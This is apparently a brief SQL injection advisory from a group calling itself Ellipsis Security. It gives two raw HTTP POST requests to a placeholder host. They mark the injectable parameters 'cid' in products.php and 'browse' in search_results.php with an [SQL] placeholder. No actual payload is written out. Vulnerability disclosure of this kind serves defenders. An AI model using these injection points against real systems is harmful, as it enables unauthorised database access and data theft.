SQL injection
POST /products.php HTTP/1.1
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 36
PHPSESSID=1&keyword=1&Submit=1&cid=[SQL]
POST /search_results.php HTTP/1.1
Host: target.xx
Content-Type: application/x-www-form-urlencoded
Content-Length: 51
PHPSESSID=1&keyword=1&show_save=1&Submit=1&browse=[SQL]
Ellipsis Security
http://www.ellsec.org